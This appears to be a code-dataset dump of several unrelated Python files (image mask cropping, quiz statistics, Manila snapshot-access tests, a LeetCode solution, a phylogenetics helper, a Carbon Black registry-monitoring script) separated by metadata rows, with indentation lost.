# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ********************************************************************/
import cv2
import os
import numpy as np
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("proposal_path", type=str,
help="relative path from python script to proposals, no slash")
parser.add_argument("--view", default=None,
help="true/1 shows each masked image")
args = parser.parse_args()
# args.proposal_path = "../test_proposals"
# args.proposal_path = args.proposal_path
included_extenstions = ['txt']
image_names = [fn[0:len(fn)-4] for fn in os.listdir(args.proposal_path)
if any(fn.endswith(ext) for ext in included_extenstions)]
for image_name in image_names:
load_path = args.proposal_path + '/' + image_name
image = cv2.imread(load_path + ".jpeg")
data = np.loadtxt(load_path + ".txt", str)
# If there is only one line, force data to be a list of lists anyway
# Note, only works for our data as first list item is a string
if isinstance(data[0], basestring):
data = [data]
# If any line does not conform to classification tl_x tl_y br_x br_y
# then forget about it
skip = False
for line in data:
if len(line) < 5:
skip = True
if skip:
continue
for i, proposal in zip(range(0,len(data)),data):
mask = cv2.imread(load_path + '_mask{0:04d}.jpeg'.format(i))
mask = np.invert(mask)
maskGray = cv2.cvtColor(mask, cv2.COLOR_BGR2GRAY)
ret, maskGray = cv2.threshold(maskGray,128,255,cv2.THRESH_BINARY)
print load_path + '_mask{0:04d}.jpeg'.format(i)
cropped = image[float(proposal[2]):float(proposal[4]), float(proposal[1]):float(proposal[3])]
masked = cv2.bitwise_and(cropped, cropped, mask = maskGray)
if args.view:
cv2.imshow("original", masked)
cv2.waitKey(0)
mask_directory = args.proposal_path + '/masked/' + proposal[0];
crop_directory = args.proposal_path + '/cropped/' + proposal[0];
if not os.path.exists(mask_directory):
os.makedirs(mask_directory)
if not os.path.exists(crop_directory):
os.makedirs(crop_directory)
cv2.imwrite(mask_directory + '/{}_{}.jpeg'.format(image_name,i), masked)
cv2.imwrite(crop_directory + '/{}_{}.jpeg'.format(image_name,i), cropped)
# item = data[]
# cropped = image[70:170, 440:540]
# startY:endY, startX:endX
# startX:startY, endX:endY
#
| 37.932773 | 105 | 0.634914 | 577 | 4,514 | 4.87695 | 0.42461 | 0.034115 | 0.039801 | 0.01919 | 0.117271 | 0.088131 | 0.06752 | 0.06752 | 0.04833 | 0.04833 | 0 | 0.015616 | 0.248117 | 4,514 | 118 | 106 | 38.254237 | 0.813494 | 0.476961 | 0 | 0 | 0 | 0 | 0.088985 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.088889 | null | null | 0.022222 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fe39cd977754d7baa5900e133ad7f76b583b9786 | 3,509 | py | Python | stats.py | shirshanka/fact-ory | 9e6bae63ca7f8f534b811058efb8942004d6a37b | [
"Apache-2.0"
] | null | null | null | stats.py | shirshanka/fact-ory | 9e6bae63ca7f8f534b811058efb8942004d6a37b | [
"Apache-2.0"
] | null | null | null | stats.py | shirshanka/fact-ory | 9e6bae63ca7f8f534b811058efb8942004d6a37b | [
"Apache-2.0"
] | null | null | null | import numpy as np;
import sys
import matplotlib.pyplot as plt;
from matplotlib import cm;
from termcolor import colored;
class Stats():
def __init__(self, param1_range, param2_range):
self._total_times = 0;
self._total_time = 0.0;
self._wrong_answers = [];
self._time_dict = {};
self._param1_range = param1_range
self._param2_range = param2_range
self._param1_length = param1_range[1] - param1_range[0] + 1
self._param2_length = param2_range[1] - param2_range[0] + 1
self._red_color = 1.0
self._green_color = 0.3
self._cream_color = 0.6
self._default_color = np.nan
self._wrong_color = 1000.0
self._time_penalty = 2.0 # time penalty for wrong answer is 5 seconds
self._result_matrix = np.full((self._param1_length, self._param2_length), self._default_color)
def add_statistic(self, operator, param1,param2,ans,time_diff):
self.add_time_statistic(param1, param2, time_diff)
x_axis = param1 - self._param1_range[0]
y_axis = param2 - self._param2_range[0]
curr_value = self._result_matrix[x_axis][y_axis]
incr_value = time_diff
if (operator.evaluate(param1, param2) != ans):
# wrong answer
self.add_wrong_answer(param1,param2,ans)
incr_value = incr_value + self._time_penalty
else:
# right answer: do nothing
pass
if np.isnan(curr_value):
self._result_matrix[x_axis][y_axis] = incr_value
else:
self._result_matrix[x_axis][y_axis] = curr_value + incr_value
def add_time_statistic(self, param1, param2, time_diff):
self._total_times = self._total_times +1;
self._total_time = self._total_time + time_diff;
if not self._time_dict.has_key(param1):
self._time_dict[param1] = []
if not self._time_dict.has_key(param2):
self._time_dict[param2] = []
self._time_dict[param1].append(time_diff)
self._time_dict[param2].append(time_diff)
def add_wrong_answer(self, param1, param2, answer_given):
self._wrong_answers.append((param1,param2, answer_given))
def get_avg_time(self):
return (self._total_time / self._total_times);
def print_stats(self, operator):
sys.stdout.write("You took an average of %0.2f seconds to answer each question!\n" % self.get_avg_time());
if self._wrong_answers != []:
print("Here were the answers you got wrong...")
for (f1,f2,ans) in self._wrong_answers:
print ("%d %s %d = " % (f1,operator.symbol,f2)), colored("%d" % ans, "red"), "Correct answer is ", colored("%d" % operator.evaluate(f1,f2), "green")
row_labels = range(self._param1_range[0],self._param1_range[1]+1)
col_labels = range(self._param2_range[0],self._param2_range[1]+1)
#plt.matshow(self._result_matrix, cmap=cm.Spectral_r, vmin=0, vmax=1)
fig = plt.figure()
ax = fig.add_subplot(111)
cax = ax.matshow(self._result_matrix, interpolation='nearest', vmin=0)
fig.colorbar(cax)
plt.gca().set_aspect('auto')
row_ticks = range(len(row_labels))
col_ticks = range(len(col_labels))
if (len(row_labels) > 10):
skip_every = int(len(row_labels) / 10);
row_labels = row_labels[0::skip_every]
row_ticks = row_ticks[0::skip_every]
if (len(col_labels) > 10):
skip_every = int(len(col_labels)/10)
col_labels = col_labels[0::skip_every]
col_ticks = col_ticks[0::skip_every]
plt.xticks(col_ticks, col_labels)
plt.yticks(row_ticks, row_labels)
plt.show()
if __name__=="__main__":
print "hello world"
| 34.742574 | 154 | 0.68937 | 529 | 3,509 | 4.228733 | 0.253308 | 0.040232 | 0.03755 | 0.022798 | 0.111757 | 0.092088 | 0.071524 | 0.039338 | 0.039338 | 0.039338 | 0 | 0.03499 | 0.185523 | 3,509 | 100 | 155 | 35.09 | 0.747726 | 0.042177 | 0 | 0.025641 | 0 | 0 | 0.051251 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.012821 | 0.064103 | null | null | 0.051282 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fe3c354a94b9bc97c332f504c7fb8dc959b31224 | 7,019 | py | Python | manila/tests/share/test_snapshot_access.py | gouthampacha/manila | 4b7ba9b99d272663f519b495668715fbf979ffbc | [
"Apache-2.0"
] | 3 | 2016-06-06T13:05:00.000Z | 2021-05-05T04:29:24.000Z | manila/tests/share/test_snapshot_access.py | gouthampacha/manila | 4b7ba9b99d272663f519b495668715fbf979ffbc | [
"Apache-2.0"
] | 5 | 2019-08-14T06:46:03.000Z | 2021-12-13T20:01:25.000Z | manila/tests/share/test_snapshot_access.py | gouthampacha/manila | 4b7ba9b99d272663f519b495668715fbf979ffbc | [
"Apache-2.0"
] | 2 | 2020-03-15T01:24:15.000Z | 2020-07-22T20:34:26.000Z | # Copyright (c) 2016 Hitachi Data Systems, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import ddt
import mock
from manila.common import constants
from manila import context
from manila import db
from manila import exception
from manila.share import snapshot_access
from manila import test
from manila.tests import db_utils
from manila import utils
@ddt.ddt
class SnapshotAccessTestCase(test.TestCase):
def setUp(self):
super(SnapshotAccessTestCase, self).setUp()
self.driver = self.mock_class("manila.share.driver.ShareDriver",
mock.Mock())
self.snapshot_access = snapshot_access.ShareSnapshotInstanceAccess(
db, self.driver)
self.context = context.get_admin_context()
share = db_utils.create_share()
self.snapshot = db_utils.create_snapshot(share_id=share['id'])
self.snapshot_instance = db_utils.create_snapshot_instance(
snapshot_id=self.snapshot['id'],
share_instance_id=self.snapshot['share']['instance']['id'])
@ddt.data(constants.ACCESS_STATE_QUEUED_TO_APPLY,
constants.ACCESS_STATE_QUEUED_TO_DENY)
def test_update_access_rules(self, state):
rules = []
for i in range(2):
rules.append({
'id': 'id-%s' % i,
'state': state,
'access_id': 'rule_id%s' % i
})
all_rules = copy.deepcopy(rules)
all_rules.append({
'id': 'id-3',
'state': constants.ACCESS_STATE_ERROR,
'access_id': 'rule_id3'
})
snapshot_instance_get = self.mock_object(
db, 'share_snapshot_instance_get',
mock.Mock(return_value=self.snapshot_instance))
snap_get_all_for_snap_instance = self.mock_object(
db, 'share_snapshot_access_get_all_for_snapshot_instance',
mock.Mock(return_value=all_rules))
self.mock_object(db, 'share_snapshot_instance_access_update')
self.mock_object(self.driver, 'snapshot_update_access')
self.mock_object(self.snapshot_access, '_check_needs_refresh',
mock.Mock(return_value=False))
self.mock_object(db, 'share_snapshot_instance_access_delete')
self.snapshot_access.update_access_rules(self.context,
self.snapshot_instance['id'])
snapshot_instance_get.assert_called_once_with(
utils.IsAMatcher(context.RequestContext),
self.snapshot_instance['id'], with_share_data=True)
snap_get_all_for_snap_instance.assert_called_once_with(
utils.IsAMatcher(context.RequestContext),
self.snapshot_instance['id'])
if state == constants.ACCESS_STATE_QUEUED_TO_APPLY:
self.driver.snapshot_update_access.assert_called_once_with(
utils.IsAMatcher(context.RequestContext),
self.snapshot_instance, rules, add_rules=rules,
delete_rules=[], share_server=None)
else:
self.driver.snapshot_update_access.assert_called_once_with(
utils.IsAMatcher(context.RequestContext),
self.snapshot_instance, [], add_rules=[],
delete_rules=rules, share_server=None)
def test_update_access_rules_delete_all_rules(self):
rules = []
for i in range(2):
rules.append({
'id': 'id-%s' % i,
'state': constants.ACCESS_STATE_QUEUED_TO_DENY,
'access_id': 'rule_id%s' % i
})
snapshot_instance_get = self.mock_object(
db, 'share_snapshot_instance_get',
mock.Mock(return_value=self.snapshot_instance))
snap_get_all_for_snap_instance = self.mock_object(
db, 'share_snapshot_access_get_all_for_snapshot_instance',
mock.Mock(side_effect=[rules, []]))
self.mock_object(db, 'share_snapshot_instance_access_update')
self.mock_object(self.driver, 'snapshot_update_access')
self.mock_object(db, 'share_snapshot_instance_access_delete')
self.snapshot_access.update_access_rules(self.context,
self.snapshot_instance['id'],
delete_all_rules=True)
snapshot_instance_get.assert_called_once_with(
utils.IsAMatcher(context.RequestContext),
self.snapshot_instance['id'], with_share_data=True)
snap_get_all_for_snap_instance.assert_called_with(
utils.IsAMatcher(context.RequestContext),
self.snapshot_instance['id'])
self.driver.snapshot_update_access.assert_called_with(
utils.IsAMatcher(context.RequestContext), self.snapshot_instance,
[], add_rules=[], delete_rules=rules, share_server=None)
def test_update_access_rules_exception(self):
rules = []
for i in range(2):
rules.append({
'id': 'id-%s' % i,
'state': constants.ACCESS_STATE_APPLYING,
'access_id': 'rule_id%s' % i
})
snapshot_instance_get = self.mock_object(
db, 'share_snapshot_instance_get',
mock.Mock(return_value=self.snapshot_instance))
snap_get_all_for_snap_instance = self.mock_object(
db, 'share_snapshot_access_get_all_for_snapshot_instance',
mock.Mock(return_value=rules))
self.mock_object(db, 'share_snapshot_instance_access_update')
self.mock_object(self.driver, 'snapshot_update_access',
mock.Mock(side_effect=exception.NotFound))
self.assertRaises(exception.NotFound,
self.snapshot_access.update_access_rules,
self.context, self.snapshot_instance['id'])
snapshot_instance_get.assert_called_once_with(
utils.IsAMatcher(context.RequestContext),
self.snapshot_instance['id'], with_share_data=True)
snap_get_all_for_snap_instance.assert_called_once_with(
utils.IsAMatcher(context.RequestContext),
self.snapshot_instance['id'])
self.driver.snapshot_update_access.assert_called_once_with(
utils.IsAMatcher(context.RequestContext), self.snapshot_instance,
rules, add_rules=rules, delete_rules=[], share_server=None)
| 41.532544 | 78 | 0.648383 | 812 | 7,019 | 5.273399 | 0.172414 | 0.13078 | 0.079402 | 0.041102 | 0.662774 | 0.65717 | 0.626576 | 0.626576 | 0.626576 | 0.626576 | 0 | 0.002511 | 0.262431 | 7,019 | 168 | 79 | 41.779762 | 0.824609 | 0.087762 | 0 | 0.53125 | 0 | 0 | 0.108172 | 0.080776 | 0 | 0 | 0 | 0 | 0.085938 | 1 | 0.03125 | false | 0 | 0.085938 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fe3d447e3c8eb707e5a1d8550493f94e70efafc2 | 269 | py | Python | packages/pyright-internal/src/tests/samples/unnecessaryCast1.py | sasano8/pyright | e804f324ee5dbd25fd37a258791b3fd944addecd | [
"MIT"
] | 4,391 | 2019-05-07T01:18:57.000Z | 2022-03-31T20:45:44.000Z | packages/pyright-internal/src/tests/samples/unnecessaryCast1.py | sasano8/pyright | e804f324ee5dbd25fd37a258791b3fd944addecd | [
"MIT"
] | 2,740 | 2019-05-07T03:29:30.000Z | 2022-03-31T12:57:46.000Z | packages/pyright-internal/src/tests/samples/unnecessaryCast1.py | sasano8/pyright | e804f324ee5dbd25fd37a258791b3fd944addecd | [
"MIT"
] | 455 | 2019-05-07T12:55:14.000Z | 2022-03-31T17:09:15.000Z | # This sample tests the type checker's reportUnnecessaryCast feature.
from typing import cast, Union
def foo(a: int):
# This should generate an error if
# reportUnnecessaryCast is enabled.
b = cast(int, a)
c: Union[int, str] = "hello"
d = cast(int, c)
| 19.214286 | 69 | 0.687732 | 40 | 269 | 4.625 | 0.75 | 0.075676 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.215613 | 269 | 13 | 70 | 20.692308 | 0.876777 | 0.498141 | 0 | 0 | 1 | 0 | 0.038168 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fe3e90a0352653677e5f89aa3d6275c22d3a1048 | 470 | py | Python | tests/test1.py | SaijC/manhwaDownloader | f6e97cfe25355598e42633a3796d84b666d5302f | [
"MIT"
] | null | null | null | tests/test1.py | SaijC/manhwaDownloader | f6e97cfe25355598e42633a3796d84b666d5302f | [
"MIT"
] | null | null | null | tests/test1.py | SaijC/manhwaDownloader | f6e97cfe25355598e42633a3796d84b666d5302f | [
"MIT"
] | null | null | null | import requests
import logging
import cfscrape
import os
from manhwaDownloader.constants import CONSTANTS as CONST
logging.basicConfig(level=logging.DEBUG)
folderPath = os.path.join(CONST.OUTPUTPATH, 'serious-taste-of-forbbiden-fruit')
logging.info(len([file for file in os.walk(folderPath)]))
walkList = [file for file in os.walk(folderPath)]
chapterDicts = dict()
for folder, _, files in walkList[1:]:
chapterDicts.update({folder: files})
print(chapterDicts) | 24.736842 | 79 | 0.778723 | 63 | 470 | 5.793651 | 0.571429 | 0.038356 | 0.060274 | 0.071233 | 0.158904 | 0.158904 | 0.158904 | 0 | 0 | 0 | 0 | 0.002392 | 0.110638 | 470 | 19 | 80 | 24.736842 | 0.870813 | 0 | 0 | 0 | 0 | 0 | 0.067941 | 0.067941 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.384615 | 0 | 0.384615 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
fe48c3bafe5a6523868023e377aa4dab0192c3a1 | 407 | py | Python | solutions/python3/894.py | sm2774us/amazon_interview_prep_2021 | f580080e4a6b712b0b295bb429bf676eb15668de | [
"MIT"
] | 42 | 2020-08-02T07:03:49.000Z | 2022-03-26T07:50:15.000Z | solutions/python3/894.py | ajayv13/leetcode | de02576a9503be6054816b7444ccadcc0c31c59d | [
"MIT"
] | null | null | null | solutions/python3/894.py | ajayv13/leetcode | de02576a9503be6054816b7444ccadcc0c31c59d | [
"MIT"
] | 40 | 2020-02-08T02:50:24.000Z | 2022-03-26T15:38:10.000Z | class Solution:
def allPossibleFBT(self, N):
def constr(N):
if N == 1: yield TreeNode(0)
for i in range(1, N, 2):
for l in constr(i):
for r in constr(N - i - 1):
m = TreeNode(0)
m.left = l
m.right = r
yield m
return list(constr(N)) | 33.916667 | 47 | 0.371007 | 49 | 407 | 3.081633 | 0.489796 | 0.139073 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.031915 | 0.538084 | 407 | 12 | 48 | 33.916667 | 0.771277 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fe4e2e11b7395e1b93b6ba3044a09072e2e8f08b | 1,230 | py | Python | Modules/Phylogenetic.py | DaneshMoradigaravand/PlasmidPerm | 7a84c1d4dbf7320dd5ba821ff0e715a89fe4b3e4 | [
"MIT"
] | null | null | null | Modules/Phylogenetic.py | DaneshMoradigaravand/PlasmidPerm | 7a84c1d4dbf7320dd5ba821ff0e715a89fe4b3e4 | [
"MIT"
] | null | null | null | Modules/Phylogenetic.py | DaneshMoradigaravand/PlasmidPerm | 7a84c1d4dbf7320dd5ba821ff0e715a89fe4b3e4 | [
"MIT"
] | null | null | null | import os
from Bio import AlignIO, Phylo
from Bio.Phylo.TreeConstruction import DistanceCalculator, DistanceTreeConstructor
class Phylogenetic:
def __init__(self, PATH):
self.PATH=PATH
def binary_sequence_generator(self, input_kmer_pattern, label):
string_inp="".join([ 'A' if x==0 else 'C' for x in input_kmer_pattern])
return([">"+label,string_inp])
def multifasta_fille_generator(self, converted_sequences_phyolgenetic):
file_output = open(os.path.join(self.PATH,"binary_presence_absence_kmers.fasta"), "w")
file_output.writelines('\n'.join(converted_sequences_phyolgenetic) + '\n' )
file_output.close()
def distance_matrix_generator(self):
align = AlignIO.read(os.path.join(self.PATH,"binary_presence_absence_kmers.fasta"), "fasta")
calculator = DistanceCalculator('identity')
distMatrix = calculator.get_distance(align)
return(distMatrix)
def distance_tree_file_generator(self,distance_matrix):
constructor = DistanceTreeConstructor()
UPGMATree = constructor.upgma(distance_matrix)
Phylo.write(UPGMATree, os.path.join(self.PATH,"binary_presence_absence_kmers.tre") , "newick") | 45.555556 | 102 | 0.71626 | 143 | 1,230 | 5.895105 | 0.454545 | 0.04745 | 0.035587 | 0.049822 | 0.168446 | 0.168446 | 0.168446 | 0.168446 | 0.168446 | 0.116251 | 0 | 0.000988 | 0.177236 | 1,230 | 27 | 102 | 45.555556 | 0.832016 | 0 | 0 | 0 | 0 | 0 | 0.105605 | 0.083672 | 0 | 0 | 0 | 0 | 0 | 1 | 0.227273 | false | 0 | 0.136364 | 0 | 0.409091 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fe50481354faa15f773f5ba3bf0a4fb0f0ded16b | 8,854 | py | Python | retrieve_regmod_values.py | cbcommunity/cbapi-examples | f8a81006b27c724582b4b04c124eb97a8c8e75d3 | [
"MIT"
] | 17 | 2016-07-21T14:58:49.000Z | 2020-10-26T15:51:38.000Z | retrieve_regmod_values.py | cbcommunity/cbapi-examples | f8a81006b27c724582b4b04c124eb97a8c8e75d3 | [
"MIT"
] | 5 | 2017-06-07T02:42:09.000Z | 2019-10-23T12:26:29.000Z | retrieve_regmod_values.py | cbcommunity/cbapi-examples | f8a81006b27c724582b4b04c124eb97a8c8e75d3 | [
"MIT"
] | 9 | 2016-10-03T02:18:23.000Z | 2021-03-08T22:44:33.000Z | #!/usr/bin/env python
#
#The MIT License (MIT)
#
# Copyright (c) 2015 Bit9 + Carbon Black
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# -----------------------------------------------------------------------------
# Extension regmod watcher and grabber
#
# This script listens to the CB messaging bus for registry modification events,
# and when a modification is seen that matches a regular expression from a file
# of registry path regular expressions, it goes and grabs the registry value
# using CB Live Response.
#
# You need to make sure rabbitmq is enabled in cb.conf, and you might need to
# open a firewall rule for port 5004. You also will need to enable regmod
# in the DatastoreBroadcastEventTypes=<values> entry. If anything is changed
# here, you'll have to do service cb-enterprise restart.
#
# TODO: More error handling, more performance improvements
#
# last updated 2016-01-23 by Ben Johnson bjohnson@bit9.com (dev-support@bit9.com)
#
import re
import Queue
import sys
from threading import Thread
import time
import traceback
try:
from cbapi.legacy.util.cli_helpers import main_helper
from cbapi.legacy.util.composite_helpers import MessageSubscriberAndLiveResponseActor
import cbapi.legacy.util.sensor_events_pb2 as cpb
except ImportError:
from cbapi.util.cli_helpers import main_helper
from cbapi.util.composite_helpers import MessageSubscriberAndLiveResponseActor
import cbapi.util.sensor_events_pb2 as cpb
class RegistryModWatcherAndValueGrabber(MessageSubscriberAndLiveResponseActor):
"""
This class subscribes to messages from the CB messaging bus,
looking for regmod events. For each regmod event, it checks
to see if the the registry path matches one of our regexes.
If it does, it goes and grabs it.
"""
def __init__(self, cb_server_url, cb_ext_api, username, password, regmod_regexes, verbose):
self.regmod_regexes = regmod_regexes
self.verbose = verbose
MessageSubscriberAndLiveResponseActor.__init__(self,
cb_server_url,
cb_ext_api,
username,
password,
"ingress.event.regmod")
# Threading so that message queue arrives do not block waiting for live response
self.queue = Queue.Queue()
self.go = True
self.worker_thread = Thread(target=self._worker_thread_loop)
self.worker_thread.start()
def on_stop(self):
self.go = False
self.worker_thread.join(timeout=2)
MessageSubscriberAndLiveResponseActor.on_stop(self)
def consume_message(self, channel, method_frame, header_frame, body):
if "application/protobuf" != header_frame.content_type:
return
try:
# NOTE -- this is not very efficient in PYTHON, and should
# use a C parser to make this much, much faster.
# http://yz.mit.edu/wp/fast-native-c-protocol-buffers-from-python/
x = cpb.CbEventMsg()
x.ParseFromString(body)
if not x.regmod or x.regmod.action != 2:
# Check for MODIFICATION event because we will usually get
# a creation event and a modification event, and might as
# well go with the one that says data has actually been written.
return
regmod_path = None
if x.regmod.utf8_regpath:
if self.verbose:
print "Event arrived: |%s|" % x.regmod.utf8_regpath
for regmod_regex in self.regmod_regexes:
if regmod_regex.match(x.regmod.utf8_regpath):
regmod_path = x.regmod.utf8_regpath
break
if regmod_path:
regmod_path = regmod_path.replace("\\registry\\machine\\", "HKLM\\")
regmod_path = regmod_path.replace("\\registry\\user\\", "HKEY_USERS\\")
regmod_path = regmod_path.strip()
# TODO -- more cleanup here potentially?
self.queue.put((x, regmod_path))
except:
traceback.print_exc()
def _worker_thread_loop(self):
while self.go:
try:
try:
(x, regmod_path) = self.queue.get(timeout=0.5)
except Queue.Empty:
continue
# TODO -- could comment this out if you want CSV data to feed into something
print "--> Attempting for %s" % regmod_path
# Go Grab it if we think we have something!
sensor_id = x.env.endpoint.SensorId
hostname = x.env.endpoint.SensorHostName
# TODO -- this could use some concurrency and work queues because we could wait a while for
# each of these to get established and retrieve the value
# Establish our CBLR session if necessary!
lrh = self._create_lr_session_if_necessary(sensor_id)
data = lrh.get_registry_value(regmod_path)
print "%s,%s,%d,%s,%s,%s" % ( time.asctime(),
hostname,
sensor_id,
x.header.process_path,
regmod_path,
data.get('value_data', "") if data else "<UNKNOWN>")
# TODO -- could *do something* here, like if it is for autoruns keys then go check the signature status
# of the binary at the path pointed to, and see who wrote it out, etc
except:
traceback.print_exc()
def main(cb, args):
username = args.get("username")
password = args.get("password")
regpaths_file = args.get("regpaths_file")
verbose = args.get("verbose", False)
if verbose:
# maybe you want to print out all the regpaths we're using?
print "Regpaths file:", regpaths_file
f = file(regpaths_file, 'rb')
regpaths_data = f.read()
f.close()
regmod_regexes = []
for line in regpaths_data.split('\n'):
line = line.strip()
if len(line) == 0:
continue
regmod_regexes.append(re.compile(line))
listener = RegistryModWatcherAndValueGrabber(args.get('server_url'), cb, username, password, regmod_regexes, verbose)
try:
if verbose:
print "Registry Mod Watcher and Grabber -- started. Watching for:", regpaths_data
else:
print "Registry Mod Watcher and Grabber -- started. Watching for %d regexes" % len(regmod_regexes)
listener.process()
except KeyboardInterrupt:
print >> sys.stderr, "Caught Ctrl-C"
listener.stop()
print "Registry Mod Watcher and Grabber -- stopped."
if __name__ == "__main__":
## YOU CAN USE data/autoruns_regexes.txt to test ##
required_args =[("-i", "--username", "store", None, "username", "CB messaging username"),
("-p", "--password", "store", None, "password", "CB messaging password"),
("-r", "--regpaths_file", "store", None, "regpaths_file", "File of newline delimited regexes for regpaths")]
optional_args = [("-v", "--verbose", "store_true", False, "verbose", "Enable verbose output")]
main_helper("Subscribe to message bus events and for each registry modification that matches one of our supplied regexes, go retrieve value.",
main,
custom_required=required_args,
custom_optional=optional_args)
| 42.980583 | 146 | 0.61588 | 1,065 | 8,854 | 5.015023 | 0.367136 | 0.026212 | 0.013106 | 0.013481 | 0.126006 | 0.105785 | 0.077514 | 0.049803 | 0.035199 | 0.016102 | 0 | 0.004838 | 0.299639 | 8,854 | 205 | 147 | 43.190244 | 0.856475 | 0.332279 | 0 | 0.135135 | 0 | 0.009009 | 0.138755 | 0.003745 | 0 | 0 | 0 | 0.009756 | 0 | 0 | null | null | 0.045045 | 0.117117 | null | null | 0.09009 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fe52c241e006580225be521c666de64401063758 | 410 | py | Python | lib/models/bn_helper.py | hongrui16/naic2020_B | 9321bdd19e7d2d47ac9c711eb8437cd364e25f44 | [
"MIT"
] | null | null | null | lib/models/bn_helper.py | hongrui16/naic2020_B | 9321bdd19e7d2d47ac9c711eb8437cd364e25f44 | [
"MIT"
] | null | null | null | lib/models/bn_helper.py | hongrui16/naic2020_B | 9321bdd19e7d2d47ac9c711eb8437cd364e25f44 | [
"MIT"
] | null | null | null | import torch
import functools
if torch.__version__.startswith('0'):
from .sync_bn.inplace_abn.bn import InPlaceABNSync
BatchNorm2d = functools.partial(InPlaceABNSync, activation='none')
BatchNorm2d_class = InPlaceABNSync
relu_inplace = False
else:
# BatchNorm2d_class = BatchNorm2d = torch.nn.SyncBatchNorm
